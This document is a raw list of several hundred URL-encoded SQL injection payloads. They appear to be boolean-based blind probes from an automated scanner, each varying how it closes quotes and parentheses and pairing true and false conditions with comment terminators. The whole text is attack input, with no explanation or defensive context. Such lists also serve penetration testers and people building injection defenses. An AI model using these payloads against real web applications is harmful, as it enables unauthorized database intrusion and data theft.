foo%29%20AND%204356%3D4356--%20 foo%29%20AND%202409%3D7347--%20 foo%27%29%20AND%201221%3D7583--%20 foo%27%29%20AND%204356%3D4356--%20 foo%27%29%20AND%207294%3D9345--%20 foo%27%20AND%204299%3D2823--%20 foo%27%20AND%204356%3D4356--%20 foo%27%20AND%206446%3D2690--%20 foo%22%20AND%207262%3D6398--%20 foo%22%20AND%204356%3D4356--%20 foo%22%20AND%203692%3D4532--%20 foo%29%20AND%205161%3D1900--%20%20AND%20%289738%3D9738 foo%29%20AND%204356%3D4356--%20%20AND%20%287799%3D7799 foo%29%20AND%207892%3D7679--%20%20AND%20%288261%3D8261 foo%29%29%20AND%207755%3D8652--%20%20AND%20%28%285055%3D5055 foo%29%29%20AND%204356%3D4356--%20%20AND%20%28%281715%3D1715 foo%29%29%20AND%201188%3D6347--%20%20AND%20%28%282823%3D2823 foo%29%29%29%20AND%201356%3D7416--%20%20AND%20%28%28%285134%3D5134 foo%29%29%29%20AND%204356%3D4356--%20%20AND%20%28%28%281511%3D1511 foo%29%29%29%20AND%209291%3D4236--%20%20AND%20%28%28%289688%3D9688 foo%20AND%204048%3D8381--%20 foo%20AND%204356%3D4356--%20 foo%20AND%209516%3D2316--%20 foo%27%29%20AND%206605%3D5061--%20%20AND%20%28%27lDTK%27%3D%27lDTK foo%27%29%20AND%204356%3D4356--%20%20AND%20%28%27wQCq%27%3D%27wQCq foo%27%29%20AND%201777%3D5628--%20%20AND%20%28%27NYGc%27%3D%27NYGc foo%27%29%29%20AND%205863%3D3130--%20%20AND%20%28%28%27MWuE%27%3D%27MWuE foo%27%29%29%20AND%204356%3D4356--%20%20AND%20%28%28%27FxPR%27%3D%27FxPR foo%27%29%29%20AND%202370%3D6869--%20%20AND%20%28%28%27rRHF%27%3D%27rRHF foo%27%29%29%29%20AND%209655%3D1928--%20%20AND%20%28%28%28%27ajIq%27%3D%27ajIq foo%27%29%29%29%20AND%204356%3D4356--%20%20AND%20%28%28%28%27KOBC%27%3D%27KOBC foo%27%29%29%29%20AND%202141%3D9071--%20%20AND%20%28%28%28%27YJBk%27%3D%27YJBk foo%27%20AND%208132%3D6590--%20%20AND%20%27NMFd%27%3D%27NMFd foo%27%20AND%204356%3D4356--%20%20AND%20%27SJvj%27%3D%27SJvj foo%27%20AND%205084%3D9909--%20%20AND%20%27fktB%27%3D%27fktB foo%27%29%20AND%207626%3D9698--%20%20AND%20%28%27GWRH%27%20LIKE%20%27GWRH foo%27%29%20AND%204356%3D4356--%20%20AND%20%28%27ZXjp%27%20LIKE%20%27ZXjp foo%27%29%20AND%206609%3D2655--%20%20AND%20%28%27crBy%27%20LIKE%20%27crBy foo%27%29%29%20AND%203712%3D7995--%20%20AND%20%28%28%27zilE%27%20LIKE%20%27zilE foo%27%29%29%20AND%204356%3D4356--%20%20AND%20%28%28%27EiTp%27%20LIKE%20%27EiTp foo%27%29%29%20AND%208973%3D7146--%20%20AND%20%28%28%27WhNT%27%20LIKE%20%27WhNT foo%27%29%29%29%20AND%205166%3D4065--%20%20AND%20%28%28%28%27NBtk%27%20LIKE%20%27NBtk foo%27%29%29%29%20AND%204356%3D4356--%20%20AND%20%28%28%28%27FzOE%27%20LIKE%20%27FzOE foo%27%29%29%29%20AND%208023%3D9697--%20%20AND%20%28%28%28%27bmIK%27%20LIKE%20%27bmIK foo%27%20AND%203883%3D7633--%20%20AND%20%27vTVd%27%20LIKE%20%27vTVd foo%27%20AND%204356%3D4356--%20%20AND%20%27JJow%27%20LIKE%20%27JJow foo%27%20AND%205377%3D9446--%20%20AND%20%27qXXv%27%20LIKE%20%27qXXv foo%22%29%20AND%201319%3D4548--%20%20AND%20%28%22KmeU%22%3D%22KmeU foo%22%29%20AND%204356%3D4356--%20%20AND%20%28%22kXMj%22%3D%22kXMj foo%22%29%20AND%208078%3D9297--%20%20AND%20%28%22xzhl%22%3D%22xzhl foo%22%29%29%20AND%207078%3D4350--%20%20AND%20%28%28%22UhwX%22%3D%22UhwX foo%22%29%29%20AND%204356%3D4356--%20%20AND%20%28%28%22DkwT%22%3D%22DkwT foo%22%29%29%20AND%209112%3D6435--%20%20AND%20%28%28%22PJaW%22%3D%22PJaW foo%22%29%29%29%20AND%205105%3D1164--%20%20AND%20%28%28%28%22HdTh%22%3D%22HdTh foo%22%29%29%29%20AND%204356%3D4356--%20%20AND%20%28%28%28%22cMTH%22%3D%22cMTH foo%22%29%29%29%20AND%205986%3D9981--%20%20AND%20%28%28%28%22zyhS%22%3D%22zyhS foo%22%20AND%207128%3D6044--%20%20AND%20%22aZOT%22%3D%22aZOT foo%22%20AND%204356%3D4356--%20%20AND%20%22MmbT%22%3D%22MmbT foo%22%20AND%202536%3D7495--%20%20AND%20%22LwuZ%22%3D%22LwuZ foo%22%29%20AND%207867%3D6438--%20%20AND%20%28%22ZqQX%22%20LIKE%20%22ZqQX foo%22%29%20AND%204356%3D4356--%20%20AND%20%28%22Mgjq%22%20LIKE%20%22Mgjq foo%22%29%20AND%201391%3D4649--%20%20AND%20%28%22Uhzq%22%20LIKE%20%22Uhzq foo%22%29%29%20AND%206471%3D6887--%20%20AND%20%28%28%22Kwxv%22%20LIKE%20%22Kwxv foo%22%29%29%20AND%204356%3D4356--%20%20AND%20%28%28%22NTKt%22%20LIKE%20%22NTKt foo%22%29%29%20AND%202451%3D6629--%20%20AND%20%28%28%22brNU%22%20LIKE%20%22brNU foo%22%29%29%29%20AND%206361%3D3446--%20%20AND%20%28%28%28%22osli%22%20LIKE%20%22osli foo%22%29%29%29%20AND%204356%3D4356--%20%20AND%20%28%28%28%22ruCe%22%20LIKE%20%22ruCe foo%22%29%29%29%20AND%208204%3D4505--%20%20AND%20%28%28%28%22Yfzg%22%20LIKE%20%22Yfzg foo%22%20AND%205585%3D8344--%20%20AND%20%22sLVc%22%20LIKE%20%22sLVc foo%22%20AND%204356%3D4356--%20%20AND%20%22PNwq%22%20LIKE%20%22PNwq foo%22%20AND%201940%3D7598--%20%20AND%20%22PEfk%22%20LIKE%20%22PEfk foo%29%20WHERE%204909%3D4909%20AND%207572%3D4597--%20 foo%29%20WHERE%209428%3D9428%20AND%204356%3D4356--%20 foo%29%20WHERE%201727%3D1727%20AND%209410%3D9375--%20 foo%27%29%20WHERE%203997%3D3997%20AND%203609%3D8784--%20 foo%27%29%20WHERE%209230%3D9230%20AND%204356%3D4356--%20 foo%27%29%20WHERE%208774%3D8774%20AND%204245%3D7170--%20 foo%27%20WHERE%203063%3D3063%20AND%209060%3D3964--%20 foo%27%20WHERE%209913%3D9913%20AND%204356%3D4356--%20 foo%27%20WHERE%204912%3D4912%20AND%206670%3D1368--%20 foo%22%20WHERE%205818%3D5818%20AND%207619%3D3830--%20 foo%22%20WHERE%209968%3D9968%20AND%204356%3D4356--%20 foo%22%20WHERE%205327%3D5327%20AND%206054%3D7920--%20 foo%27%20%7C%7C%20%28SELECT%205295%20FROM%20DUAL%20WHERE%203926%3D3926%20AND%203272%3D4959--%20%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%203132%20FROM%20DUAL%20WHERE%201242%3D1242%20AND%204356%3D4356--%20%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%203563%20FROM%20DUAL%20WHERE%203775%3D3775%20AND%209623%3D9480--%20%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%202364%20WHERE%208113%3D8113%20AND%208061%3D2592--%20%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%206733%20WHERE%209267%3D9267%20AND%204356%3D4356--%20%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208429%20WHERE%208577%3D8577%20AND%207653%3D6017--%20%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%203398%20FROM%20DUAL%20WHERE%202989%3D2989%20AND%203484%3D7103--%20%20%29 foo%20%2B%20%28SELECT%204443%20FROM%20DUAL%20WHERE%205704%3D5704%20AND%204356%3D4356--%20%20%29 foo%20%2B%20%28SELECT%206828%20FROM%20DUAL%20WHERE%208813%3D8813%20AND%206225%3D5510--%20%20%29 foo%20%2B%20%28SELECT%209350%20WHERE%208850%3D8850%20AND%203963%3D4777--%20%20%29 foo%20%2B%20%28SELECT%203892%20WHERE%204620%3D4620%20AND%204356%3D4356--%20%20%29 foo%20%2B%20%28SELECT%209693%20WHERE%208183%3D8183%20AND%206744%3D2254--%20%20%29 foo%27%20%2B%20%28SELECT%20%27AOsq%27%20FROM%20DUAL%20WHERE%205817%3D5817%20AND%209104%3D8277--%20%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27bMwk%27%20FROM%20DUAL%20WHERE%207220%3D7220%20AND%204356%3D4356--%20%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27EUOL%27%20FROM%20DUAL%20WHERE%205559%3D5559%20AND%205691%3D1583--%20%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27GhsY%27%20WHERE%203158%3D3158%20AND%201530%3D3815--%20%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27LGWe%27%20WHERE%203871%3D3871%20AND%204356%3D4356--%20%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27Aujx%27%20WHERE%208567%3D8567%20AND%205319%3D7341--%20%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%206021%3D3595--%20%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%204356%3D4356--%20%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209328%3D2224--%20%20%23 -1914%29%20OR%20NOT%20%283859%3D3092%29 -3740%29%20OR%20NOT%20%288557%3D8557%29 -8696%29%20OR%20NOT%20%282553%3D4902%29 -7773%27%29%20OR%20NOT%20%286830%3D5185%29 -3764%27%29%20OR%20NOT%20%288557%3D8557%29 -8897%27%29%20OR%20NOT%20%281850%3D3726%29 -5277%27%20OR%20NOT%20%287115%3D6891%29 -8853%27%20OR%20NOT%20%288557%3D8557%29 -2969%27%20OR%20NOT%20%285895%3D1112%29 -2062%22%20OR%20NOT%20%288097%3D6645%29 -3953%22%20OR%20NOT%20%288557%3D8557%29 -7512%22%20OR%20NOT%20%287205%3D9439%29 -6902%29%20OR%20NOT%20%285461%3D3567%29%20AND%20%281878%3D1878 -1257%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%281773%3D1773 -9851%29%20OR%20NOT%20%289482%3D7651%29%20AND%20%282891%3D2891 -5880%29%29%20OR%20NOT%20%283832%3D5544%29%20AND%20%28%289449%3D9449 -7005%29%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%285295%3D5295 -8470%29%29%20OR%20NOT%20%286066%3D9928%29%20AND%20%28%282814%3D2814 -7049%29%29%29%20OR%20NOT%20%282842%3D7179%29%20AND%20%28%28%285091%3D5091 -4225%29%29%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%28%281956%3D1956 -3443%29%29%29%20OR%20NOT%20%286441%3D8099%29%20AND%20%28%28%288992%3D8992 -8315%20OR%20NOT%20%285404%3D3742%29 -3010%20OR%20NOT%20%288557%3D8557%29 -6518%20OR%20NOT%20%284160%3D8784%29 -2022%27%29%20OR%20NOT%20%286867%3D4523%29%20AND%20%28%27bfYv%27%3D%27bfYv -5893%27%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%27qnrA%27%3D%27qnrA -9103%27%29%20OR%20NOT%20%282960%3D9753%29%20AND%20%28%27DmSK%27%3D%27DmSK -9050%27%29%29%20OR%20NOT%20%284847%3D1085%29%20AND%20%28%28%27GCsN%27%3D%27GCsN -6569%27%29%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%28%27rAAc%27%3D%27rAAc -9792%27%29%29%20OR%20NOT%20%283425%3D1558%29%20AND%20%28%28%27ywGQ%27%3D%27ywGQ -4651%27%29%29%29%20OR%20NOT%20%283916%3D1486%29%20AND%20%28%28%28%27QQTy%27%3D%27QQTy -2134%27%29%29%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%28%28%27BUZq%27%3D%27BUZq -1926%27%29%29%29%20OR%20NOT%20%281645%3D8297%29%20AND%20%28%28%28%27QyjG%27%3D%27QyjG -5108%27%20OR%20NOT%20%284054%3D9475%29%20AND%20%27ClsR%27%3D%27ClsR -5295%27%20OR%20NOT%20%288557%3D8557%29%20AND%20%27PCND%27%3D%27PCND -1019%27%20OR%20NOT%20%286104%3D4709%29%20AND%20%27npmR%27%3D%27npmR -4005%27%29%20OR%20NOT%20%288914%3D6354%29%20AND%20%28%27bsXD%27%20LIKE%20%27bsXD -2664%27%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%27Eqgj%27%20LIKE%20%27Eqgj -7567%27%29%20OR%20NOT%20%287223%3D6433%29%20AND%20%28%27lCTw%27%20LIKE%20%27lCTw -8393%27%29%29%20OR%20NOT%20%288805%3D8907%29%20AND%20%28%28%27piJW%27%20LIKE%20%27piJW -6056%27%29%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%28%27sPte%27%20LIKE%20%27sPte -9787%27%29%29%20OR%20NOT%20%289597%3D8331%29%20AND%20%28%28%27LdVC%27%20LIKE%20%27LdVC -8528%27%29%29%29%20OR%20NOT%20%288867%3D3834%29%20AND%20%28%28%28%27eBzH%27%20LIKE%20%27eBzH -8990%27%29%29%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%28%28%27LcoH%27%20LIKE%20%27LcoH -7598%27%29%29%29%20OR%20NOT%20%286819%3D9877%29%20AND%20%28%28%28%27nbfm%27%20LIKE%20%27nbfm -6124%27%20OR%20NOT%20%285675%3D8314%29%20AND%20%27nWZd%27%20LIKE%20%27nWZd -8812%27%20OR%20NOT%20%288557%3D8557%29%20AND%20%27rSWi%27%20LIKE%20%27rSWi -4683%27%20OR%20NOT%20%281641%3D6186%29%20AND%20%27zrIm%27%20LIKE%20%27zrIm -7942%22%29%20OR%20NOT%20%287574%3D9973%29%20AND%20%28%22UFda%22%3D%22UFda -9583%22%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%22cqZT%22%3D%22cqZT -1221%22%29%20OR%20NOT%20%289031%3D8553%29%20AND%20%28%22pynB%22%3D%22pynB -9872%22%29%29%20OR%20NOT%20%287325%3D5456%29%20AND%20%28%28%22PHHY%22%3D%22PHHY -1104%22%29%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%28%22NUUG%22%3D%22NUUG -2762%22%29%29%20OR%20NOT%20%281462%3D4216%29%20AND%20%28%28%22CYLW%22%3D%22CYLW -3841%22%29%29%29%20OR%20NOT%20%281888%3D2275%29%20AND%20%28%28%28%22YkTO%22%3D%22YkTO -5805%22%29%29%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%28%28%22pYYZ%22%3D%22pYYZ -9611%22%29%29%29%20OR%20NOT%20%281589%3D8819%29%20AND%20%28%28%28%22rcyn%22%3D%22rcyn -4133%22%20OR%20NOT%20%289248%3D5049%29%20AND%20%22CLZv%22%3D%22CLZv -3467%22%20OR%20NOT%20%288557%3D8557%29%20AND%20%22AUOV%22%3D%22AUOV -8540%22%20OR%20NOT%20%287884%3D8304%29%20AND%20%22iHqT%22%3D%22iHqT -8544%22%29%20OR%20NOT%20%285405%3D3066%29%20AND%20%28%22foOn%22%20LIKE%20%22foOn -9230%22%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%22NTOl%22%20LIKE%20%22NTOl -8556%22%29%20OR%20NOT%20%281897%3D2768%29%20AND%20%28%22Szrv%22%20LIKE%20%22Szrv -1889%22%29%29%20OR%20NOT%20%285828%3D7123%29%20AND%20%28%28%22KPKt%22%20LIKE%20%22KPKt -4501%22%29%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%28%22GhOR%22%20LIKE%20%22GhOR -8494%22%29%29%20OR%20NOT%20%288172%3D4946%29%20AND%20%28%28%22oioV%22%20LIKE%20%22oioV -5020%22%29%29%29%20OR%20NOT%20%288092%3D2334%29%20AND%20%28%28%28%22KKLU%22%20LIKE%20%22KKLU -5643%22%29%29%29%20OR%20NOT%20%288557%3D8557%29%20AND%20%28%28%28%22KLUU%22%20LIKE%20%22KLUU -1356%22%29%29%29%20OR%20NOT%20%288520%3D2267%29%20AND%20%28%28%28%22hyez%22%20LIKE%20%22hyez -1992%22%20OR%20NOT%20%286888%3D1507%29%20AND%20%22Ogcj%22%20LIKE%20%22Ogcj -1712%22%20OR%20NOT%20%288557%3D8557%29%20AND%20%22ybFe%22%20LIKE%20%22ybFe -8008%22%20OR%20NOT%20%282333%3D2875%29%20AND%20%22QuQt%22%20LIKE%20%22QuQt -8509%29%20WHERE%208902%3D8902%20OR%20NOT%20%283086%3D2617%29 -7342%29%20WHERE%201975%3D1975%20OR%20NOT%20%288557%3D8557%29 -1073%29%20WHERE%207456%3D7456%20OR%20NOT%20%282414%3D5775%29 -7920%27%29%20WHERE%206016%3D6016%20OR%20NOT%20%286517%3D2308%29 -8582%27%29%20WHERE%208677%3D8677%20OR%20NOT%20%288557%3D8557%29 -2241%27%29%20WHERE%202892%3D2892%20OR%20NOT%20%286149%3D9038%29 -9474%27%20WHERE%204256%3D4256%20OR%20NOT%20%289846%3D3924%29 -2617%27%20WHERE%207143%3D7143%20OR%20NOT%20%288557%3D8557%29 -9441%27%20WHERE%204563%3D4563%20OR%20NOT%20%284744%3D3631%29 -9246%22%20WHERE%206054%3D6054%20OR%20NOT%20%285637%3D7710%29 -1464%22%20WHERE%204077%3D4077%20OR%20NOT%20%288557%3D8557%29 -4962%22%20WHERE%204277%3D4277%20OR%20NOT%20%288540%3D4582%29 -1020%29%20OR%20NOT%20%286624%3D9135%29%23 -5709%29%20OR%20NOT%20%288893%3D8893%29%23 -1700%29%20OR%20NOT%20%285646%3D3332%29%23 -1497%27%29%20OR%20NOT%20%284306%3D7014%29%23 -5233%27%29%20OR%20NOT%20%288893%3D8893%29%23 -4641%27%29%20OR%20NOT%20%288766%3D5069%29%23 -2057%27%20OR%20NOT%20%283518%3D6821%29%23 -9981%27%20OR%20NOT%20%288893%3D8893%29%23 -6059%27%20OR%20NOT%20%284853%3D4769%29%23 -6179%22%20OR%20NOT%20%281049%3D4037%29%23 -9072%22%20OR%20NOT%20%288893%3D8893%29%23 -7381%22%20OR%20NOT%20%285550%3D2198%29%23 -4141%29%20OR%20NOT%20%289729%3D7784%29%23%20AND%20%283184%3D3184 -2084%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%287386%3D7386 -8540%29%20OR%20NOT%20%288011%3D8510%29%23%20AND%20%288858%3D8858 -2493%29%29%20OR%20NOT%20%283595%3D1479%29%23%20AND%20%28%287984%3D7984 -5573%29%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%288268%3D8268 -2618%29%29%20OR%20NOT%20%286071%3D2856%29%23%20AND%20%28%287138%3D7138 -7051%29%29%29%20OR%20NOT%20%283782%3D8098%29%23%20AND%20%28%28%284248%3D4248 -8562%29%29%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%28%285309%3D5309 -7011%29%29%29%20OR%20NOT%20%282759%3D6308%29%23%20AND%20%28%28%284823%3D4823 -4805%20OR%20NOT%20%289153%3D2639%29%23 -1198%20OR%20NOT%20%288893%3D8893%29%23 -3560%20OR%20NOT%20%281445%3D5188%29%23 -6506%27%29%20OR%20NOT%20%285274%3D4549%29%23%20AND%20%28%27qPPp%27%3D%27qPPp -5310%27%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%27fyqb%27%3D%27fyqb -4704%27%29%20OR%20NOT%20%281885%3D9434%29%23%20AND%20%28%27atXT%27%3D%27atXT -1298%27%29%29%20OR%20NOT%20%281886%3D6207%29%23%20AND%20%28%28%27qDWN%27%3D%27qDWN -1511%27%29%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%28%27pMLv%27%3D%27pMLv -3235%27%29%29%20OR%20NOT%20%283748%3D4774%29%23%20AND%20%28%28%27YjFB%27%3D%27YjFB -2597%27%29%29%29%20OR%20NOT%20%282298%3D8716%29%23%20AND%20%28%28%28%27WpGf%27%3D%27WpGf -5404%27%29%29%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%28%28%27bHZI%27%3D%27bHZI -6023%27%29%29%29%20OR%20NOT%20%283855%3D6629%29%23%20AND%20%28%28%28%27sgWO%27%3D%27sgWO -7699%27%20OR%20NOT%20%285094%3D1327%29%23%20AND%20%27cdGY%27%3D%27cdGY -3345%27%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%27gfUL%27%3D%27gfUL -3224%27%20OR%20NOT%20%281433%3D4753%29%23%20AND%20%27XlHw%27%3D%27XlHw -2881%27%29%20OR%20NOT%20%282701%3D6786%29%23%20AND%20%28%27pDRE%27%20LIKE%20%27pDRE -5617%27%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%27lnCM%27%20LIKE%20%27lnCM -6985%27%29%20OR%20NOT%20%287510%3D3581%29%23%20AND%20%28%27jMIm%27%20LIKE%20%27jMIm -7052%27%29%29%20OR%20NOT%20%285570%3D1853%29%23%20AND%20%28%28%27CFPy%27%20LIKE%20%27CFPy -9490%27%29%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%28%27eJpO%27%20LIKE%20%27eJpO -3177%27%29%29%20OR%20NOT%20%285205%3D8583%29%23%20AND%20%28%28%27VoDS%27%20LIKE%20%27VoDS -4517%27%29%29%29%20OR%20NOT%20%289610%3D4807%29%23%20AND%20%28%28%28%27xYVW%27%20LIKE%20%27xYVW -8191%27%29%29%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%28%28%27novn%27%20LIKE%20%27novn -1156%27%29%29%29%20OR%20NOT%20%284958%3D9181%29%23%20AND%20%28%28%28%27oerT%27%20LIKE%20%27oerT -6825%27%20OR%20NOT%20%281638%3D6448%29%23%20AND%20%27lWXl%27%20LIKE%20%27lWXl -6006%27%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%27VbWO%27%20LIKE%20%27VbWO -7924%27%20OR%20NOT%20%282407%3D9864%29%23%20AND%20%27wjAj%27%20LIKE%20%27wjAj -8537%22%29%20OR%20NOT%20%286319%3D1109%29%23%20AND%20%28%22Odjm%22%3D%22Odjm -7693%22%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%22Xuan%22%3D%22Xuan -3242%22%29%20OR%20NOT%20%289941%3D8741%29%23%20AND%20%28%22XQev%22%3D%22XQev -7044%22%29%29%20OR%20NOT%20%287426%3D9756%29%23%20AND%20%28%28%22qfTc%22%3D%22qfTc -9032%22%29%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%28%22vWSM%22%3D%22vWSM -6272%22%29%29%20OR%20NOT%20%289247%3D5037%29%23%20AND%20%28%28%22sXVa%22%3D%22sXVa -2490%22%29%29%29%20OR%20NOT%20%287279%3D5388%29%23%20AND%20%28%28%28%22ADwn%22%3D%22ADwn -2494%22%29%29%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%28%28%22CvSH%22%3D%22CvSH -5064%22%29%29%29%20OR%20NOT%20%288994%3D1515%29%23%20AND%20%28%28%28%22AIeX%22%3D%22AIeX -1822%22%20OR%20NOT%20%282086%3D2110%29%23%20AND%20%22xcPB%22%3D%22xcPB -6130%22%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%22pjCU%22%3D%22pjCU -7969%22%20OR%20NOT%20%281552%3D5711%29%23%20AND%20%22RPoe%22%3D%22RPoe -3821%22%29%20OR%20NOT%20%288976%3D1074%29%23%20AND%20%28%22FwsC%22%20LIKE%20%22FwsC -2512%22%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%22iTxJ%22%20LIKE%20%22iTxJ -7259%22%29%20OR%20NOT%20%289330%3D8752%29%23%20AND%20%28%22vKpf%22%20LIKE%20%22vKpf -1935%22%29%29%20OR%20NOT%20%282348%3D8983%29%23%20AND%20%28%28%22BECE%22%20LIKE%20%22BECE -9905%22%29%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%28%22PAeV%22%20LIKE%20%22PAeV -7332%22%29%29%20OR%20NOT%20%289684%3D3197%29%23%20AND%20%28%28%22wTvW%22%20LIKE%20%22wTvW -4509%22%29%29%29%20OR%20NOT%20%286728%3D5221%29%23%20AND%20%28%28%28%22OgoZ%22%20LIKE%20%22OgoZ -7366%22%29%29%29%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%28%28%28%22Fwcr%22%20LIKE%20%22Fwcr -4779%22%29%29%29%20OR%20NOT%20%286162%3D4034%29%23%20AND%20%28%28%28%22enIQ%22%20LIKE%20%22enIQ -2118%22%20OR%20NOT%20%283672%3D5905%29%23%20AND%20%22bXOM%22%20LIKE%20%22bXOM -6796%22%20OR%20NOT%20%288893%3D8893%29%23%20AND%20%22OSLJ%22%20LIKE%20%22OSLJ -2008%22%20OR%20NOT%20%281435%3D9788%29%23%20AND%20%22AdsS%22%20LIKE%20%22AdsS -8741%29%20WHERE%205029%3D5029%20OR%20NOT%20%281852%3D3751%29%23 -2386%29%20WHERE%203523%3D3523%20OR%20NOT%20%288893%3D8893%29%23 -2941%29%20WHERE%208043%3D8043%20OR%20NOT%20%286247%3D8329%29%23 -2623%27%29%20WHERE%201073%3D1073%20OR%20NOT%20%282658%3D8476%29%23 -9831%27%29%20WHERE%205561%3D5561%20OR%20NOT%20%288893%3D8893%29%23 -4539%27%29%20WHERE%204568%3D4568%20OR%20NOT%20%284608%3D4997%29%23 -6965%27%20WHERE%205067%3D5067%20OR%20NOT%20%289587%3D3245%29%23 -8715%27%20WHERE%206482%3D6482%20OR%20NOT%20%288893%3D8893%29%23 -7382%27%20WHERE%203408%3D3408%20OR%20NOT%20%286291%3D4289%29%23 -4358%22%20WHERE%204611%3D4611%20OR%20NOT%20%282402%3D1932%29%23 -2291%22%20WHERE%202341%3D2341%20OR%20NOT%20%288893%3D8893%29%23 -8224%22%20WHERE%202264%3D2264%20OR%20NOT%20%283150%3D6993%29%23 -6541%29%20OR%20NOT%20%289651%3D2920%29--%20 -5761%29%20OR%20NOT%20%287158%3D7158%29--%20 -1023%29%20OR%20NOT%20%289720%3D8351%29--%20 -4836%27%29%20OR%20NOT%20%284757%3D3657%29--%20 -8208%27%29%20OR%20NOT%20%287158%3D7158%29--%20 -6163%27%29%20OR%20NOT%20%288776%3D6852%29--%20 -6702%27%20OR%20NOT%20%289424%3D1307%29--%20 -7694%27%20OR%20NOT%20%287158%3D7158%29--%20 -2303%27%20OR%20NOT%20%285737%3D1190%29--%20 -5251%22%20OR%20NOT%20%283088%3D3837%29--%20 -1888%22%20OR%20NOT%20%287158%3D7158%29--%20 -1952%22%20OR%20NOT%20%287519%3D3751%29--%20 -1866%29%20OR%20NOT%20%289333%3D7073%29--%20%20AND%20%283834%3D3834 -7252%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%282481%3D2481 -7151%29%20OR%20NOT%20%282516%3D1796%29--%20%20AND%20%285093%3D5093 -5933%29%29%20OR%20NOT%20%284074%3D4492%29--%20%20AND%20%28%284857%3D4857 -7251%29%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%289845%3D9845 -2975%29%29%20OR%20NOT%20%286335%3D1996%29--%20%20AND%20%28%287747%3D7747 -3626%29%29%29%20OR%20NOT%20%284026%3D3508%29--%20%20AND%20%28%28%281301%3D1301 -7893%29%29%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%28%285130%3D5130 -2432%29%29%29%20OR%20NOT%20%284181%3D7757%29--%20%20AND%20%28%28%286269%3D6269 -6837%20OR%20NOT%20%282124%3D5710%29--%20 -5334%20OR%20NOT%20%287158%3D7158%29--%20 -1002%20OR%20NOT%20%286743%3D1134%29--%20 -5621%27%29%20OR%20NOT%20%282783%3D5273%29--%20%20AND%20%28%27USxS%27%3D%27USxS -2320%27%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%27UyTS%27%3D%27UyTS -3950%27%29%20OR%20NOT%20%289855%3D6392%29--%20%20AND%20%28%27EYyi%27%3D%27EYyi -7588%27%29%29%20OR%20NOT%20%281247%3D1835%29--%20%20AND%20%28%28%27SxIz%27%3D%27SxIz -4896%27%29%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%28%27tepJ%27%3D%27tepJ -4908%27%29%29%20OR%20NOT%20%285508%3D7987%29--%20%20AND%20%28%28%27QPDK%27%3D%27QPDK -3041%27%29%29%29%20OR%20NOT%20%281173%3D8385%29--%20%20AND%20%28%28%28%27Zbwa%27%3D%27Zbwa -1862%27%29%29%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%28%28%27qRji%27%3D%27qRji -8762%27%29%29%29%20OR%20NOT%20%283219%3D7963%29--%20%20AND%20%28%28%28%27mudy%27%3D%27mudy -6724%27%20OR%20NOT%20%281392%3D7119%29--%20%20AND%20%27vbPq%27%3D%27vbPq -8812%27%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%27VpTe%27%3D%27VpTe -1547%27%20OR%20NOT%20%285875%3D6716%29--%20%20AND%20%27PlHb%27%3D%27PlHb -2314%27%29%20OR%20NOT%20%284181%3D5263%29--%20%20AND%20%28%27Wkyr%27%20LIKE%20%27Wkyr -5789%27%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%27efyB%27%20LIKE%20%27efyB -3230%27%29%20OR%20NOT%20%289948%3D5511%29--%20%20AND%20%28%27DJgg%27%20LIKE%20%27DJgg -6538%27%29%29%20OR%20NOT%20%287198%3D9106%29--%20%20AND%20%28%28%27vIZY%27%20LIKE%20%27vIZY 